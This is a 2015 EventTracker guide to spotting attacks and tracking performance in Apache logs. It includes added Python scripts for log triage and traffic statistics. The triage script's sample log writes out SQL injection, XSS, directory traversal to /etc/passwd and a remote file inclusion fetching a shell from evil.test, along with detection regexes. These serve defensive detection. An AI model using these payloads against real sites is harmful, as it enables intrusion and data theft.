Apache: Analyze Logs for Malicious Activities & Monitor Server Performance




EventTracker v7.6
Publication Date: Feb 12, 2015
EventTracker, 8815 Centre Park Drive, Columbia MD 21045
www.eventtracker.com

About this Guide
This guide helps the reader analyze Apache web server logs for malicious activity and monitor the server's performance.

Scope
The configurations detailed in this guide are consistent with EventTracker Enterprise version 7.6.

Audience
Users who wish to analyze Apache logs for malicious activity and track web server performance.

The information contained in this document represents the current view of Prism Microsystems Inc. on the issues discussed as of the date of publication. Because Prism Microsystems must respond to changing market conditions, it should not be interpreted as a commitment on the part of Prism Microsystems, and Prism Microsystems cannot guarantee the accuracy of any information presented after the date of publication. This document is for informational purposes only. Prism Microsystems MAKES NO WARRANTIES, EXPRESS OR IMPLIED, AS TO THE INFORMATION IN THIS DOCUMENT.

Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, this paper may be freely distributed without permission from Prism, as long as its content is unaltered, nothing is added to the content and credit to Prism is provided. Prism Microsystems may have patents, patent applications, trademarks, copyrights, or other intellectual property rights covering subject matter in this document. Except as expressly provided in any written license agreement from Prism Microsystems, the furnishing of this document does not give you any license to these patents, trademarks, copyrights, or other intellectual property.

The example companies, organizations, products, people and events depicted herein are fictitious. No association with any real company, organization, product, person or event is intended or should be inferred.

2015 Prism Microsystems Corporation. All rights reserved. The names of actual companies and products mentioned herein may be the trademarks of their respective owners.

Table of Contents
Introduction
Identifying clues of attack
  Spikes in visits in a specific duration
  Hits with 4xx, 5xx status codes
  Same IP address making multiple visits in a short duration
  Web site attacks exploiting software vulnerabilities
Monitoring performance
  Monitoring CPU/memory/disk usage
Web traffic statistics

Introduction

Detecting an attack after it has occurred is a daunting task: one has to go through many logs to arrive at a conclusion. EventTracker provides statistics in the form of behaviors, dashboards and reports that reduce the volume of logs an analyst has to read before concluding that an attack took place. The pointers below help you analyze both attacks against and the performance of an Apache web server.

Attacks are not the only concern; the performance parameters of the web server matter too. Check that the server is performing optimally with respect to memory, disk and CPU, and keep track of low disk space and high CPU or memory usage on the Apache server.

Identifying clues of attack

These are the important areas to look at when identifying malicious activity or attacks that may be occurring. Some of the indicators below require further analysis to identify the source or nature of the attack, and some may instead point to a malfunctioning web server or a programming error in the web application hosted on it.

NOTE: The details in this section are of most interest to a security analyst identifying attacks and securing the web server against future web attacks.

Spikes in visits in a specific duration

A website usually shows a regular pattern, or average, of visits. Occasionally there are short spikes for legitimate reasons such as a webinar or a discount sale, but on many occasions a spike also indicates an attacker probing or flooding the site.

Figure 1 (graph of hit count over time, showing a spike)

Figure 1 shows a spike in hit count.

What to look out for?
Is the traffic from a single IP address or a handful of them? If so, what is the reputation or WHOIS information for those addresses?

EventTracker helps with:
- Flex dashboard with hit count for the last 24 hours. Clicking the graph shows the details of the visits during that period.
- Behavior of client IP address activity, which can be used for out-of-ordinary detection or with list management.

Hits with 4xx, 5xx status codes

HTTP status 200 indicates that the request was served successfully. The other classes carry different meanings: 3xx codes are redirects and are usually benign, 4xx codes are client errors (for example 403 Forbidden or 404 Not Found) and 5xx codes are server errors. It is the 4xx and 5xx codes that warrant attention. A list of all status codes and their meanings is available at http://www.w3schools.com/tags/ref_httpmessages.asp

Figure 2 (graph of hit count by status code)

Figure 2 shows hits with status 403 and some with 404.

What to look out for?
A log entry with a non-200 status code does not by itself mean an attack. These codes do, however, carry information worth bringing to the web administrator's notice.

Example: Status code 404 means the page or resource is not available at the requested location. This may mean users are looking for a specific page on the site; a common cause is an advertisement link placed by the website owners on another site that throws an error when clicked. Bring such links to the web administrator's notice so they can be corrected. By contrast, many 404s from a single client in a short time usually mean the client is probing for known application paths (login pages, admin consoles) rather than following links.

A log entry with a 5xx status means the server is misconfigured or is returning error messages to users. Inform the web administrator.

EventTracker helps with:
- Dashboard with a count for each status code found in the last 24 hours. Clicking the graph shows the details.
- A behavior for tracking new and out-of-ordinary activity for each status code.

Same IP address making multiple visits in a short duration

As mentioned earlier, a spike in hit count, or a single IP address accessing page(s) on the website many times in a short span of time, may indicate an attack.

Figure 3 (graph of hits per client IP address)

Figure 3 shows two IP addresses with higher hit counts than the rest.

What to look out for?
What is the reputation or WHOIS information for the IP address? Has the same IP address been seen doing anything else on the web server?

EventTracker helps with:
- Flex dashboard with the top 10 client IP addresses found in the last 24 hours. Clicking the graph shows the details of the visits during that period.
- Behavior of client IP address activity, which can be used for out-of-ordinary detection or with list management.

Web site attacks exploiting software vulnerabilities

New web-based attack types and vectors appear every day, and enterprises are taking extra steps to secure their websites. Some of the common web attacks observed are:
1) SQL injection
2) Cross-site scripting
3) Remote file inclusion
4) JavaScript injection

These attacks are difficult to identify by reading the logs directly. They require pattern analysis and keyword detection on the request URI and its parameters, and the request should be URL-decoded first, since attackers routinely encode their payloads.

EventTracker helps with:
- Pre-defined website attack reports for the common attack types identified by OWASP. These reports can be scheduled to run daily. They provide pointers to attacks; further analysis is needed to assess the impact.

Monitoring performance

NOTE: The details in this section are of most interest to a system administrator monitoring the web server's vital parameters, memory and CPU usage, to make sure the server is up and performing optimally.
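Before turning to performance, here is an added example that is not part of the EventTracker guide or product. The Python script below applies the four attack indicators from the preceding section to raw Apache combined-format log lines: it buckets hits per minute and flags spike minutes against the median, counts status classes and clients with many 404s, lists the busiest client IPs together with everything one client did, and matches URL-decoded requests against coarse SQL injection, cross-site scripting, remote file inclusion and directory traversal signatures. The log lines, IP addresses, hostnames and signature patterns are all constructed for the example; the signatures are deliberately simple leads, not a WAF rule set.

```python
"""Apache access-log triage for the indicators in the preceding section:
hit-count spikes, non-200 status codes, noisy clients and attack signatures.
Standard library only. SAMPLE_LOG is constructed for this example."""
import re
import statistics
from collections import Counter
from datetime import datetime
from urllib.parse import unquote

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Coarse, assumed signatures checked against the URL-decoded path and query.
# They are illustrative leads, not EventTracker's rule set or a WAF.
SIGNATURES = {
    "sqli": re.compile(r"(?i)'\s*(or|and)\s+\d+\s*=\s*\d+|union\s+select|sleep\(|benchmark\("),
    "xss": re.compile(r"(?i)<script|javascript:|on(error|load)\s*="),
    "rfi": re.compile(r"(?i)=\s*(https?|ftp)://"),
    "traversal": re.compile(r"\.\./"),
}

# Constructed sample: two ordinary visitors, a scanner at 10:02, one bad line.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Feb/2015:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0"
203.0.113.5 - - [12/Feb/2015:10:00:31 +0000] "GET /products.php?id=7 HTTP/1.1" 200 2210 "http://example.test/" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) Version/8.0 Mobile/12B411 Safari/600.1.4"
203.0.113.5 - - [12/Feb/2015:10:01:12 +0000] "GET /promo-2014.html HTTP/1.1" 404 209 "http://partner.test/ad" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) Version/8.0 Mobile/12B411 Safari/600.1.4"
198.51.100.7 - - [12/Feb/2015:10:01:40 +0000] "POST /login HTTP/1.1" 302 - "http://example.test/login" "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0"
192.0.2.44 - - [12/Feb/2015:10:02:01 +0000] "GET /wp-login.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; scanner/1.0)"
192.0.2.44 - - [12/Feb/2015:10:02:01 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; scanner/1.0)"
192.0.2.44 - - [12/Feb/2015:10:02:02 +0000] "GET /admin/ HTTP/1.1" 403 199 "-" "Mozilla/5.0 (compatible; scanner/1.0)"
192.0.2.44 - - [12/Feb/2015:10:02:02 +0000] "GET /products.php?id=7%27%20OR%201%3D1-- HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (compatible; scanner/1.0)"
192.0.2.44 - - [12/Feb/2015:10:02:03 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1800 "-" "Mozilla/5.0 (compatible; scanner/1.0)"
192.0.2.44 - - [12/Feb/2015:10:02:03 +0000] "GET /page.php?file=http://evil.test/shell.txt HTTP/1.1" 200 1800 "-" "Mozilla/5.0 (compatible; scanner/1.0)"
192.0.2.44 - - [12/Feb/2015:10:02:04 +0000] "GET /download.php?f=../../etc/passwd HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; scanner/1.0)"
203.0.113.5 - - [12/Feb/2015:10:03:15 +0000] "GET /checkout.php HTTP/1.1" 500 530 "http://example.test/cart" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) Version/8.0 Mobile/12B411 Safari/600.1.4"
this line is not in combined log format and is counted as malformed
"""


def parse(text):
    """Return (records, malformed_count); malformed lines are counted, not dropped silently."""
    records, malformed = [], 0
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            malformed += 1
            continue
        rec = m.groupdict()
        ts = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        rec["minute"] = ts.strftime("%Y-%m-%d %H:%M")   # bucket key for spike detection
        rec["status"] = int(rec["status"])
        rec["decoded"] = unquote(rec["path"])            # decode before signature matching
        records.append(rec)
    return records, malformed


def spike_minutes(records, factor=2.0, min_hits=5):
    """Minutes with at least `factor` times the median per-minute hit count (and at
    least `min_hits`). Production use would baseline against a longer history."""
    per_min = Counter(r["minute"] for r in records)
    if not per_min:
        return []
    baseline = statistics.median(per_min.values())
    return sorted(m for m, n in per_min.items() if n >= min_hits and n >= factor * baseline)


def status_classes(records):
    """Hits per status class: 3xx are redirects, 4xx client errors, 5xx server faults."""
    return Counter(f"{r['status'] // 100}xx" for r in records)


def noisy_404_clients(records, threshold=3):
    """Clients with `threshold` or more 404s: typical of path probing by scanners."""
    c = Counter(r["ip"] for r in records if r["status"] == 404)
    return sorted(ip for ip, n in c.items() if n >= threshold)


def top_clients(records, n=3):
    return Counter(r["ip"] for r in records).most_common(n)


def client_profile(records, ip):
    """Everything one client did: answers 'has this IP done anything else?'"""
    mine = [r for r in records if r["ip"] == ip]
    return {"hits": len(mine),
            "statuses": dict(Counter(r["status"] for r in mine)),
            "paths": sorted({r["decoded"] for r in mine})}


def attack_hits(records):
    """(ip, label, decoded request) per signature match; leads, not proof of compromise."""
    return [(r["ip"], label, r["decoded"])
            for r in records
            for label, rx in SIGNATURES.items() if rx.search(r["decoded"])]


if __name__ == "__main__":
    recs, bad = parse(SAMPLE_LOG)
    print(len(recs), "records,", bad, "malformed")
    print("spikes:", spike_minutes(recs), "| 404-heavy:", noisy_404_clients(recs))
    print("top clients:", top_clients(recs), "| status:", dict(status_classes(recs)))
    for ip, label, path in attack_hits(recs):
        print(f"{label:9} {ip:13} {path}")
```

Three points worth noting when adapting this to real logs: the request is URL-decoded before matching, because an encoded payload such as %27%20OR%201%3D1 would otherwise slip past a naive keyword search; the spike baseline here is the median of the window being analyzed, which a real deployment should replace with a longer history (the same hour on previous days, for instance); and unparseable lines are counted rather than discarded, since a sudden rise in malformed lines is itself worth an alert (a log format change, or log injection through a crafted User-Agent).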

Monitoring CPU/memory/disk usage

Figure 4 (trend of remaining disk space over the last 7 days)

What to look out for?
Is the Apache server having frequent spikes in CPU usage? Is memory usage within threshold limits? Are the disk partitions running out of space?

EventTracker helps with:
- Dashboard for monitoring CPU and memory usage against defined thresholds.
- Alerts when low disk space or sustained high CPU or memory usage is observed.

Web traffic statistics

NOTE: The details in this section are of most interest to a website owner monitoring the web server's traffic trends and page hits.

Apache logs provide a wealth of information when analyzed and correlated. These statistics are of most use to people concerned with website traffic and usage rather than with security. Some of the common questions are:
- Are there any 404 (file not found) errors?
- Which browsers and browser versions are commonly used?
- How many visitors access the site through a smartphone or tablet?
- What is the trend of the hit count on the site?

Figure 5
Figure 6

Figure 7

EventTracker helps with:
- AWStats log analysis report, which provides statistical figures and analytical data such as the trend observed in recent days.
- Flex dashboard with hit count for the last 24 hours. Clicking the graph shows the details of the visits during that period.
- A behavior for tracking new and out-of-ordinary activity for each status code.
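The four questions above can also be answered directly from parsed access-log records. As an added example that is not part of the EventTracker guide, the AWStats report or any vendor code, the Python below takes already-parsed records (constructed inline here, as are the user-agent strings) and computes the 404 list with the referring page, the browser family and major version, the share of visitors on a phone or tablet, and the daily hit trend. The record field names and the user-agent patterns are assumptions; crawlers are separated out so they do not skew the browser and mobile shares.

```python
"""Traffic statistics over already-parsed access-log records: broken links
(404s with their referrers), browser family/version, mobile share and daily
hit trend. RECORDS and the UA strings are constructed for this example; in
practice they come from a log parser."""
import re
from collections import Counter

# Ordered: a Chrome UA also says "Safari", and an Edge UA also says "Chrome".
BROWSERS = [
    ("Edge", re.compile(r"Edge/(\d+)")),
    ("Chrome", re.compile(r"Chrome/(\d+)")),
    ("Firefox", re.compile(r"Firefox/(\d+)")),
    ("Safari", re.compile(r"Version/(\d+).*Safari/")),
    ("IE", re.compile(r"MSIE (\d+)|Trident/.*rv:(\d+)")),
]
MOBILE_RE = re.compile(r"Mobile|Android|iPhone|iPad|Windows Phone")
BOT_RE = re.compile(r"(?i)bot|crawler|spider")

UA = {  # constructed user-agent strings
    "chrome": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36",
    "firefox": "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0",
    "iphone": "Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4",
    "ie11": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko",
    "android": "Mozilla/5.0 (Linux; Android 4.4.2; Nexus 5 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.89 Mobile Safari/537.36",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
}


def rec(day, ua, path, status, referer="-"):
    """Build one parsed-record dict (field names are this example's assumption)."""
    return {"day": day, "ua": UA[ua], "path": path, "status": status, "referer": referer}


RECORDS = [  # constructed three-day sample
    rec("2015-02-10", "chrome", "/", 200),
    rec("2015-02-10", "firefox", "/products.php", 200),
    rec("2015-02-10", "iphone", "/promo-2014.html", 404, "http://partner.test/ad"),
    rec("2015-02-11", "ie11", "/", 200),
    rec("2015-02-11", "android", "/products.php", 200),
    rec("2015-02-11", "googlebot", "/robots.txt", 200),
    rec("2015-02-11", "chrome", "/promo-2014.html", 404, "http://partner.test/ad"),
    rec("2015-02-12", "firefox", "/old/page.html", 404),
    rec("2015-02-12", "iphone", "/", 200),
]


def browser(ua):
    """(family, major version); crawlers are labelled 'Bot' so they can be excluded."""
    if BOT_RE.search(ua):
        return ("Bot", "")
    for family, rx in BROWSERS:
        m = rx.search(ua)
        if m:
            return (family, next(g for g in m.groups() if g))
    return ("Other", "")


def is_mobile(ua):
    return bool(MOBILE_RE.search(ua))


def broken_links(records):
    """404s keyed by (path, referrer). A referrer on another site points at an
    external link, e.g. an advertisement, that the web admin should get fixed."""
    return Counter((r["path"], r["referer"]) for r in records if r["status"] == 404)


def human(records):
    return [r for r in records if browser(r["ua"])[0] != "Bot"]


def browser_share(records):
    return Counter(browser(r["ua"])[0] for r in human(records))


def mobile_share(records):
    """Fraction of non-bot hits from a phone or tablet."""
    h = human(records)
    return sum(is_mobile(r["ua"]) for r in h) / len(h) if h else 0.0


def daily_trend(records):
    return sorted(Counter(r["day"] for r in records).items())
```

Two design choices matter for the numbers to be meaningful: the browser patterns are tested in a fixed order because user-agent strings are cumulative (every Chrome string also claims to be Safari), and crawler traffic is excluded before computing shares, otherwise a busy search-engine bot would dominate both the browser breakdown and the hit trend.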
